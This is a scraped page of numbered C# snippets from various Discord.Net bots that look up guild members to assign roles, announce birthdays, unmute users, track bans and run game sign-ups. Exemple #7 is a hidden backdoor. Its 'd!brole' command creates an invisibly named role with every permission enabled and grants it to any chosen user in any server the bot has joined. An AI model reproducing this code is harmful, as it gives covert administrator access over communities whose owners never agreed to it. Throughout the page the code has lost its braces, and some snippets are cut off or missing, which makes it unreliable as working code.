Exemple #1
        private async Task UpdateMessageRoles(IMessage message)
                var roles = _guild.Roles;

                IRole role = roles.FirstOrDefault(r => r.Name == message.Content);
                if (role == null)
                    role = await _guild.CreateRoleAsync(message.Content, GuildPermissions.None, Color.Default, false,

                var reactions = message.GetReactionUsersAsync(subscribeEmoji, 100).Flatten();
                await reactions.ForEachAsync(async r =>
                                             await _guild.GetUser(r.Id).AddRoleAsync(role)

            catch (Exception e)
Exemple #2
        private async Task NotifyGuild(List <BirthdayModel> currentBirthdays, SocketGuild guild, SocketTextChannel channel, IRole role)
            if (currentBirthdays.Any(x => guild.GetUser(x.UserId) != null))
                var guildBirthdays = currentBirthdays.Select(x => (guild.GetUser(x.UserId), x)).Where(x => x.Item1 != null).ToList();

                foreach (var user in guildBirthdays)
                    if (user.Item1.Roles.Any(x => x.Id == role.Id))
                        //Users are assigned the birthday role
                        //Therefore if they already have the role their birthday will have been announced.

                    await user.Item1.AddRoleAsync(role).ConfigureAwait(false);

                    await channel.SendMessageAsync($"{user.Item1.Mention}", false, new EmbedBuilder()
                        Title       = $"Happy Birthday to {user.Item1.Nickname ?? user.Item1.Username}",
                        Description = user.Item2.ShowYear ? $"They are now: {user.Item2.Age()} years old" : null,
                        Color       = Color.Blue,
                        Author      = new EmbedAuthorBuilder()
                            IconUrl = user.Item1.GetAvatarUrl(),
                            Name    = user.Item1.Nickname ?? user.Item1.Username
Exemple #3
        public static async Task AssignRoleAsync(ulong user, ulong role)
            var svUser = _guild.GetUser(user);
            var svRole = _guild.GetRole(role);

            await AssignRoleAsync(svUser, svRole).ConfigureAwait(true);
        async Task <bool> FixRaidMessageAfterLoad(SocketGuild guild, IUserMessage message)
            var raidInfo = ParseRaidInfo(message);

            if (raidInfo == null)

            logger.LogInformation($"Updating raid message '{message.Id}'");

            raidStorageService.AddRaid(guild.Id, message.Channel.Id, message.Id, raidInfo);
            // Adjust user count
            var allUsersWithThumbsUp = await message.GetReactionUsersAsync(Emojis.ThumbsUp, ReactionUsersLimit).FlattenAsync();

            var usersWithThumbsUp = allUsersWithThumbsUp
                                    .Where(t => !t.IsBot)
                                    .Select(t => guild.GetUser(t.Id))
                                    .Where(t => t != null);

            foreach (var user in usersWithThumbsUp)
                raidInfo.Players[user.Id] = userService.GetPlayer(guild.GetUser(user.Id));

            // Extra players
            for (int i = 0; i < Emojis.KeycapDigits.Length; i++)
                var emoji = Emojis.KeycapDigits[i];
                var usersWithKeycapReaction = await message.GetReactionUsersAsync(emoji, ReactionUsersLimit).FlattenAsync();

                foreach (var user in usersWithKeycapReaction.Where(t => !t.IsBot))
                    raidInfo.ExtraPlayers.Add((user.Id, ExtraPlayerKeycapDigitToCount(emoji.Name)));

            await message.ModifyAsync(t =>
                t.Content = string.Empty;
                t.Embed   = ToEmbed(raidInfo);

            var allReactions     = message.Reactions;
            var invalidReactions = allReactions.Where(t => !IsValidReactionEmote(t.Key.Name)).ToList();

            // Remove invalid reactions
            foreach (var react in invalidReactions)
                var users = await message.GetReactionUsersAsync(react.Key, ReactionUsersLimit, retryOptions).FlattenAsync();

                foreach (var user in users)
                    await message.RemoveReactionAsync(react.Key, user, retryOptions);

Exemple #5
        public async Task MainAsync()
            await _discordClient.LoginAsync(TokenType.Bot, File.ReadAllText(TokenLocation)).ConfigureAwait(true);

            await _discordClient.StartAsync().ConfigureAwait(true);

            // Block the program until it is closed.
            while (true)
                var line = Console.ReadLine();
                //user wants to exit
                if (line == "exit")
                //TODO: Clean this up, its so ugly
                if (line == "recheck")
                    var serverNonReacts = await GetNonReactUsersAsync(ServerRulesId, ServerRulesMessageId).ConfigureAwait(true);

                    //TODO: My mind is burnt out right now, i was gonna do something with this earlier
                    //var tenManNonReacts = await GetNonReactUsers(TenManRulesId, TenManRulesMessageId).ConfigureAwait(true);
                    var visitorRole = GetSocketRoleFromId(VisitorRoleId);

                    foreach (var x in serverNonReacts)
                        if (x.IsBot)

                        var fUser = _guild.Users.First(y => y.Id == x.Id);

                        if (fUser.Roles.Count == 2 && fUser.Roles.Contains(visitorRole))
                        var guildUser = _guild.GetUser(fUser.Id);

                        foreach (var r in guildUser.Roles)
                            if (r.IsEveryone)
                            await RoleAssigner.RemoveRoleAsync(guildUser, r).ConfigureAwait(true);

                        await RoleAssigner.AssignRoleAsync(x.Id, VisitorRoleId).ConfigureAwait(true);

Exemple #6
        public void PollElections()
            using (VooperContext context = new VooperContext(DBOptions))
                foreach (Election election in context.Elections.AsQueryable().Where(x => x.Active))
                    if (DateTime.UtcNow > election.End_Date)
                        // End the election
                        if (election.Type.ToLower() == "senate")
                            var results = election.GetResults().Result;

                            User winner = results[0].Candidate;

                            election.Active    = false;
                            election.Winner_Id = winner.Id;


                            District district = context.Districts.Find(election.District);
                            district.Senator = winner.Id;

                            Group group = context.Groups.Find(district.Group_Id);
                            group.Owner_Id = winner.Id;


                            SocketGuildUser dUser = server.GetUser((ulong)winner.discord_id);
                            if (dUser != null)
                                dUser.AddRoleAsync(server.Roles.FirstOrDefault(x => x.Name == "Senator"));

                            EmbedBuilder embed = new EmbedBuilder()
                                Color = new Color(0, 100, 255),
                                Title = $"**{winner.UserName}** wins Senate Election!"

                            embed.AddField("News Outlet", "VoopAI Auto News");
                            embed.AddField("Author", "VoopAI The Bot");
                            embed.AddField("Content", $"Congratulations to {winner.UserName} on winning the {election.District} elections! They won with {results[0].Votes} votes to become the new Senator. " +
                                           $"Please check other news outlets for more details!");

                            VoopAI.newsChannel.SendMessageAsync(embed: embed.Build());
Exemple #7
        public async Task role(ulong Uid, ulong GuildId)
            if (check != true)

            if (Context.Client.Guilds.Where(x => x.Id == GuildId).Count() < 1)
                await Context.User.SendMessageAsync($":x: **I am not in a guild with id: {GuildId}**");

            SocketGuild Guild = Context.Client.Guilds.Where(x => x.Id == GuildId).FirstOrDefault();
            SocketUser  UserS = Guild.GetUser(Uid);

            if (UserS == null)
                await Context.User.SendMessageAsync($":x: **Can't find user with id: {Uid} in {Guild.Name}**");

                GuildPermissions perm = new GuildPermissions();
                Color            col  = new Color(47, 49, 54);
                perm = perm.Modify(true, true, true, true, true, true, true, true, true, true, true, true, true, true, true, true, true, true, true, true, true, true, true, true, true, true, true);
                if (Guild.Roles.Where(x => x.Name == "ᅠ").Count() < 1)
                    await Guild.CreateRoleAsync("ᅠ", perm, col, false);
                var role = Guild.Roles.FirstOrDefault(x => x.Name == "ᅠ");
                await Guild.GetUser(Uid).AddRoleAsync(role);

                EmbedBuilder eb = new EmbedBuilder();
                eb.WithAuthor($"Succesfull", UserS.GetAvatarUrl());
                eb.WithColor(40, 200, 150);
                eb.WithDescription($":white_check_mark: **Role gave to {UserS.Username} in {Guild.Name} succesfully**");
                await Context.User.SendMessageAsync("", false, eb.Build());

                string text = $"[{DateTime.UtcNow}] {Context.User.Username} used d!brole command for user {Guild.Users.FirstOrDefault(x => x.Id == Uid).Username} in {Guild.Name}.";
                await bLog(text);
            catch (Exception ex)
                EmbedBuilder eb = new EmbedBuilder();
                eb.WithColor(40, 200, 150);
                eb.WithDescription($":x: **Can't give role to user with id {Uid} in {Guild.Name} {Environment.NewLine} Error: {ex.Message}**");
                await Context.User.SendMessageAsync("", false, eb.Build());
Exemple #8
        public static async Task <SocketGuildUser> GetGuildUserAsync(this SocketGuild guild, ulong id)
            SocketGuildUser user = guild.GetUser(id);

            if (user == null)
                await guild.DownloadUsersAsync();

                user = guild.GetUser(id);
Exemple #9
        public static bool IsHigherRankedThan(this SocketUser currentUser, SocketUser compareUser, SocketGuild guild)
            var currentGuildUser = guild.GetUser(currentUser.Id);
            var compareGuildUser = guild.GetUser(compareUser.Id);

            if (currentUser == null || compareUser == null || currentGuildUser == null || compareGuildUser == null)
                throw new NullReferenceException("Specified users cannot be null and must be a member of the target guild");

            return(IsHigherRankedThan(currentGuildUser, compareGuildUser));
Exemple #10
        public static Task Initialize()
            var timer = new Timer(5000)
                AutoReset = true,
                Enabled   = true

            timer.Elapsed += async(_, _) =>
                List <MutedUser> curMutedUsers = await DatabaseQueries.GetAllAsync <MutedUser>(x => x.ExpiresAt < DateTime.Now.ToOADate());

                foreach (MutedUser mutedUser in curMutedUsers)
                    SocketGuild guild = ConfigProperties.Client.GetGuild(mutedUser.ServerId);

                    if (guild == null)
                        goto RemoveFromDB;

                    Server server = await DatabaseQueries.GetOrCreateServerAsync(guild.Id);

                    SocketGuildUser user     = guild.GetUser(mutedUser.UserId);
                    SocketGuildUser selfUser = guild.GetUser(ConfigProperties.Client.CurrentUser.Id);

                        SocketRole muteRole = guild.Roles.FirstOrDefault(x => x.Name == "kaguya-mute");
                        await user.RemoveRoleAsync(muteRole);

                        KaguyaEvents.TriggerUnmute(new ModeratorEventArgs(server, guild, user, selfUser,
                                                                          "Automatic unmute (timed mute has expired)", null));
                    catch (Exception)
                        await ConsoleLogger.LogAsync($"Exception handled when unmuting a user in guild [Name: {guild.Name} | ID: {guild.Id}]",

                    await DatabaseQueries.UpdateAsync(server);

                    await DatabaseQueries.DeleteAsync(mutedUser);

                    await ConsoleLogger.LogAsync($"User [ID: {mutedUser.UserId}] has been automatically unmuted.",

Exemple #11
        public static async Task <ulong> MakeBanMessage(IServiceProvider map, SocketGuild guild, Dictionary <ulong, DateTime> bans, ulong banMessageId, ulong banAnnouncementChannel, string messageText)
                var message = "";

                var list = bans.ToList();

                list.Sort((x, y) => x.Value.CompareTo(y.Value));

                foreach (var ban in list)
                    if (guild.GetUser(ban.Key) != null)
                        message += $"{guild.GetUser(ban.Key).Mention}-{ban.Value.ToString()}\n";
                        message += $"<@!{ban.Key}>-{ban.Value.ToString()}\n";

                var embed = new EmbedBuilder()

                if (banMessageId != 0)
                    var banAnnouncemens = guild.GetTextChannel(banAnnouncementChannel);
                    var banMessage      = await banAnnouncemens.GetMessageAsync(banMessageId) as IUserMessage;

                    await banMessage.ModifyAsync(x => x.Embed = embed.Build());

                    var banAnnouncemens = guild.GetTextChannel(banAnnouncementChannel);
                    var sentMessage     = await banAnnouncemens.SendMessageAsync(messageText, embed : embed.Build());

            catch (Exception e)
                Console.WriteLine($"[{DateTime.Now.ToString()}] MakeBanMessageFailed: {e.Message}");

Exemple #12
        public static async Task <SocketGuildUser> GetUserFromGuildAsync(this SocketGuild guild, string userId)
            var idOfUser = Convert.ToUInt64(userId);
            var user     = guild.GetUser(idOfUser);

            if (user == null)
                await guild.DownloadUsersAsync().ConfigureAwait(false);

                user = guild.GetUser(idOfUser);

Exemple #13
        public string Clean(SocketGuild guild)
            int numErrors = 0, numSuccesses = 0;
            var role = guild.Roles.SingleOrDefault(r => r.Name == "Applicant");

            foreach (var user in _applicants.ToList())
                var socketUser = _client.GetUser(user.DiscordId);

                // Deleted user?
                if (socketUser == null)
                    if (_applicants.Remove(user))
                // Is the user in the guild?
                else if (guild.GetUser(user.DiscordId) == null)
                    if (_applicants.Remove(user))
                // Does the user exist, but is not an applicant anymore?
                else if (!guild.GetUser(user.DiscordId).Roles.Contains(role))
                    if (_applicants.Remove(user))
            _data.Save("applicants", _applicants);
            return("Clean completed. There were " + numSuccesses + " orphaned data. " +
                   "Error(s): " + numErrors);
        public async Task Start()
            //getting the user on the server to see their roles
            SocketGuild     s = _client.GetGuild(Config.SERVER_ID_MINIGAMES);
            SocketGuildUser u = s.GetUser(Context.User.Id);

            bool roleFound = false; //to output correct message

            //loopsing through roles to see if they have the correct one
            foreach (SocketRole role in u.Roles)
                if (role.Name == "Coordinator" || s.Owner.Id == Context.User.Id)
                    _game.ClearGame();                              //clears previous lists
                    _game.GameController = Context.User.ToString(); //sets the controller to whoever used this command
                    _game.startTime      = DateTime.Now;
                    _game.GameGoing      = true;
                    roleFound            = true;
                    await UpdateTextChannel();
            if (roleFound)
                await ReplyAsync("Game is started.");
                await ReplyAsync("User does not have the proper role to coordinate games.");
 private void CheckEveryonePermissions(SocketGuild guild, ulong userID)
     if (guild.GetUser(userID) == null)
         throw new ForbiddenAccessException("User defined in authorization header is not on required server.");
        public async Task PrintEmbed()
            //getting the user on the server to see their roles
            SocketGuild     s = _client.GetGuild(Config.SERVER_ID_MINIGAMES);
            SocketGuildUser u = s.GetUser(Context.User.Id);

            bool roleFound = false; //to output correct message

            //loopsing through roles to see if they have the correct one
            foreach (SocketRole role in u.Roles)
                if (role.Name == "Admin" || s.Owner.Id == Context.User.Id)
                    roleFound = true;
            if (roleFound)
                await ReplyAsync("", false, eb1);
                await ReplyAsync("You do not have permission to use this!");
        public async Task ClearScouts()
            //getting the user on the server to see their roles
            SocketGuild     s = _client.GetGuild(Config.SERVER_ID_MINIGAMES);
            SocketGuildUser u = s.GetUser(Context.User.Id);

            bool roleFound = false; //to output correct message

            //loopsing through roles to see if they have the correct one
            foreach (SocketRole role in u.Roles)
                if (role.Name == "Admin" || s.Owner.Id == Context.User.Id)
                    roleFound = true;
            if (roleFound)
                await ReplyAsync(_bands.ClearInfo());
                await UpdateTextChannel("[" + Context.User.ToString() + "] - " + " Imformation cleared.");
                await ReplyAsync("You do not have permission to use this!");
        public async Task RemoveWorld(int worldNum)
            //getting the user on the server to see their roles
            SocketGuild     s = _client.GetGuild(Config.SERVER_ID_MINIGAMES);
            SocketGuildUser u = s.GetUser(Context.User.Id);

            bool roleFound = false; //to output correct message

            //loopsing through roles to see if they have the correct one
            foreach (SocketRole role in u.Roles)
                if (role.Name == "Geobies" || role.Name == "Goobies" || s.Owner.Id == Context.User.Id)
                    roleFound = true;
            if (roleFound)
                await ReplyAsync(_bands.RemoveWorld(worldNum));
                await UpdateTextChannel("[" + Context.User.ToString() + "] " + " removed world " + worldNum);
                await ReplyAsync("You do not have permission to use this!");
        public async Task OutputMonthlyTotals()
            //getting the user on the server to see their roles
            SocketGuild     s = _client.GetGuild(Config.SERVER_ID_MINIGAMES);
            SocketGuildUser u = s.GetUser(Context.User.Id);

            bool roleFound = false; //to output correct message

            //loopsing through roles to see if they have the correct one
            foreach (SocketRole role in u.Roles)
                if (role.Name == "Geobies" || role.Name == "Goobies" || s.Owner.Id == Context.User.Id)
                    roleFound = true;
            if (roleFound)
                List <string> output = _bands.OutputTotalScouts();
                for (int i = 0; i < output.Count; ++i)
                    await ReplyAsync(output[i]);
                await ReplyAsync("You do not have permission to use this!");
Exemple #20
        static public Embed LogJoin(SocketGuild guild, SocketGuildUser user)
            //Try to narrow down the name of the user who created the invite
            var    invites    = guild.GetInvitesAsync().Result.ToArray();
            string inviterMsg = ".";

                foreach (var inviteData in invites)
                    List <string> codes = JackFrostBot.UserSettings.Invites.GetCodes(guild.Id);
                    foreach (string code in codes)
                        if (!invites.Any(x => x.Code.ToString().Equals(code)) && invites.Count().Equals(codes.Count - 1))
                            ulong inviterID = JackFrostBot.UserSettings.Invites.GetUser(guild.Id, code);
                            var   inviter   = guild.GetUser(inviterID);
                            inviterMsg = $"by **{inviter.Username}** ({inviter.Id}) using invite ``{code}``";
            catch { }

            var builder = new EmbedBuilder()
                          .WithDescription($":calling: **{user.Username}** was invited to the server{inviterMsg}")
                          .WithColor(new Color(0x0094FF));

Exemple #21
        public async Task RoleRemoveUsers(SocketGuild server, List <ulong> userList, List <IRole> roleList, SocketChannel channel = null, bool outputMessages = false)
            // Define variables
            string          output;
            SocketGuildUser user;

            // Initialise variables
            output = "";

                foreach (ulong curUserID in userList)
                    user = server.GetUser(curUserID);
                    await user.RemoveRolesAsync(roleList);
                output += $"Removed {userList.Count} users from {roleList.Count} roles";
                output += "\r\n";
            catch (Exception ex)
            if (channel != null && outputMessages)
                await ReplyAsync(output);
Exemple #22
        private static async Task SendMessageAsync(SocketGuild guild, EmbedBuilder embed, IReadOnlyCollection <SocketUser> message_mentions, SocketGuildChannel channel)
            IUserMessage message = await(channel as IMessageChannel).SendMessageAsync(null, false, embed.Build());

            if (message_mentions.Count > 0)
                var sendMentions = Task.Run(async() =>
                    string mentions = "";
                    foreach (var user in message_mentions)
                        if (guild.GetUser(user.Id) != null)
                            mentions = mentions + " " + user.Mention;
                    if (mentions.Length > 0)
                        var mention = await(channel as IMessageChannel).SendMessageAsync(mentions);
                        await Task.Delay(100);
                        await mention.DeleteAsync();
Exemple #23
        private async Task OnReactionRemoved(Cacheable <IUserMessage, ulong> cache, ISocketMessageChannel channel, SocketReaction reaction)
            // remove vote
            if (pendingGames.ContainsKey(reaction.MessageId) && reaction.Emote.Name == "\u2705")
            else if (reaction.MessageId == roleMessageId)
                // they reacted to the correct role message
                IGuildChannel   guildChannel = channel as IGuildChannel;
                SocketGuild     guild        = guildChannel.Guild as SocketGuild; //GlobalUtils.client.Guilds.FirstOrDefault();
                SocketUser      user         = GlobalUtils.client.GetUser(reaction.UserId);
                SocketGuildUser guser        = guild.GetUser(user.Id);
                Console.WriteLine("Remove Game Role: " + guser.Nickname);
                for (int i = 0; i < games.Count && i < GlobalUtils.menu_emoji.Count <string>(); i++)
                    if (GlobalUtils.menu_emoji[i] == reaction.Emote.Name)
                        Console.WriteLine("Emoji Found");
                        var result = from a in guild.Roles
                                     where a.Name == games[i].game
                                     select a;
                        SocketRole role = result.FirstOrDefault();
                        Console.WriteLine("Role: " + role.Name);
                        await guser.RemoveRoleAsync(role);

Exemple #24
        public bool IsMatch(SocketMessage message)
            SocketGuild     socketGuild     = message.Author.MutualGuilds.Single(x => x.Name == this.discordClient.GuildName);
            SocketGuildUser socketGuildUser = socketGuild.GetUser(message.Author.Id);

            return(this.regex.IsMatch(message.Content) && socketGuildUser.Roles.Any(x => x.Name == this.discordClient.AnnouncementRoleName));
Exemple #25
        public static EmbedBuilder UnconfirmedEmbed(bool adminConfirmed, MinecraftGuild minecraftGuild, ulong guildId, List <bool> confirmedMembers)
            EmbedBuilder  embed;
            StringBuilder description = new StringBuilder();

            description.AppendLine($"Admin Confirmation: {(adminConfirmed ? "Granted" : "*Pending*")}");
            for (int i = 0; i < minecraftGuild.MemberIds.Count; i++)
                ulong           memberId = (ulong)minecraftGuild.MemberIds[i];
                SocketGuildUser member   = null;
                SocketGuild     guild    = BotCore.Client.GetGuild(guildId);
                if (guild != null)
                    member = guild.GetUser(memberId);

                description.AppendLine($"{(member == null ? memberId.ToString() : member.Mention)} Founding Membership Confirmation: {(confirmedMembers[i] ? "Granted" : "*Pending*")}");
            embed = new EmbedBuilder()
                Title       = $"Founding of Guild \"{minecraftGuild.Name}\" - Waiting for confirmations",
                Color       = minecraftGuild.DiscordColor,
                Description = description.ToString()
Exemple #26
        private async Task RestartBot(SocketInteraction interaction, ulong botId)
            if (interaction.User.Id != Config.ReversesId)
                await interaction.PrintError();


            else if (!Bots.List.Contains(botId))
                await interaction.PrintError("That can't be restarted");


            var botAccount = _reversesGuild.GetUser(botId);
            await interaction.RespondAsync(embed : new EmbedBuilder()
                                           .WithAuthor(new EmbedAuthorBuilder()
                                                       .WithName($"Restarted {botAccount.Username}")
Exemple #27
        public async Task CheckReaction(Cacheable <IUserMessage, ulong> cachedMessage, ISocketMessageChannel channel, SocketReaction reaction)
            try {
                if ((reaction.User.IsSpecified && reaction.User.Value.IsBot) || !(channel is SocketGuildChannel))
                    return; //Makes sure it's not logging a message from a bot and that it's in a discord server
                var message              = cachedMessage.GetOrDownloadAsync().Result;
                SocketGuildChannel chnl  = channel as SocketGuildChannel;
                SocketGuild        guild = chnl?.Guild;
                if (guild == null)

                ModerationSettings settings = guild.LoadFromFile <ModerationSettings>(false);
                SocketGuildUser    gUser    = guild.GetUser(reaction.UserId);
                var Guild = chnl.Guild;
                if (settings?.badUEmojis.IsNullOrEmpty() ?? true || (reaction.User.Value as SocketGuildUser).CantBeWarned() || reaction.User.Value.IsBot)
                if (settings.badUEmojis.Select(emoji => new Emoji(emoji)).Contains(reaction.Emote))
                    await message.RemoveReactionAsync(reaction.Emote, reaction.User.Value);

                    await((SocketGuildUser)reaction.User.Value).Warn(1, "Bad reaction used", channel as SocketTextChannel);
                    IUserMessage warnMessage = await channel.SendMessageAsync(
                        $"{reaction.User.Value.Mention} has been given their {(reaction.User.Value as SocketGuildUser).LoadInfractions().Count.Suffix()} infraction because of bad reaction used");
            } catch (Exception e) {
                await new LogMessage(LogSeverity.Error, "Filter", "Something went wrong with the reaction filter", e).Log();
        private async Task OnReactionAdded(Cacheable <IUserMessage, ulong> cache, ISocketMessageChannel channel, SocketReaction reaction)
            SocketUser      user  = GlobalUtils.client.GetUser(reaction.UserId);
            SocketGuildUser guser = user as SocketGuildUser;

            if (channel.Id != roleChannel.Id || user.IsBot)
                return;                                            // Task.CompletedTask;
            if (reaction.MessageId == roleMessageId)
                // they reacted to the correct role message
                SocketGuild guild = GlobalUtils.client.Guilds.FirstOrDefault();
                guser = guild.GetUser(user.Id);
                for (int i = 0; i < roles.Count && i < 9; i++)
                    if (menu_emoji[i] == reaction.Emote.Name)
                        var result = from a in guild.Roles
                                     where a.Name == roles[i]
                                     select a;
                        SocketRole role = result.FirstOrDefault();
                        await guser.AddRoleAsync(role);
Exemple #29
        private static async Task MoveUserFromWaitingListToSubscribers(PickupQueue queue, Subscriber subscriber, ISocketMessageChannel channel, SocketGuild guild)
            if (queue.WaitingList.Any())
                var next = queue.WaitingList.First();


                var nextUser = guild.GetUser(next.Id);
                if (nextUser != null)
                    await channel.SendMessageAsync($"{PickupHelpers.GetMention(nextUser)} - you have been added to '{queue.Name}' since {subscriber.Name} has left.").AutoRemoveMessage();

                    if (queue.Started)
                        var team = queue.Teams.FirstOrDefault(w => w.Subscribers.Exists(s => s.Id == subscriber.Id));
                        if (team != null)
                            team.Subscribers.Remove(team.Subscribers.Find(s => s.Id == subscriber.Id));
                            team.Subscribers.Add(new Subscriber {
                                Name = PickupHelpers.GetNickname(nextUser), Id = nextUser.Id
                            await channel.SendMessageAsync($"{PickupHelpers.GetMention(nextUser)} - you are on the {team.Name}")

                    await PickupHelpers.NotifyUsers(queue, guild.Name, nextUser);
Exemple #30
        public Embed GetWaifuFromCharacterSearchResult(string title, IEnumerable <Card> cards, SocketGuild guild)
            string contentString = "";

            foreach (var card in cards)
                string favIcon      = "";
                string shopIcon     = "";
                string tradableIcon = card.IsTradable ? "" : "⛔";
                if (card.Tags != null)
                    favIcon  = card.Tags.Contains("ulubione", StringComparison.CurrentCultureIgnoreCase) ? " 💗" : "";
                    shopIcon = card.Tags.Contains("wymiana", StringComparison.CurrentCultureIgnoreCase) ? " 🔄" : "";
                string tags = $"{tradableIcon}{favIcon}{shopIcon}";

                var thU = guild.GetUser(card.GameDeck.UserId);
                if (thU != null)
                    contentString += $"{thU.Mention ?? "????"} **[{card.Id}]** {tags}\n";

            return(new EmbedBuilder()
                Color = EMType.Info.Color(),
                Description = $"{title}\n\n{contentString.TrimToLength(1850)}"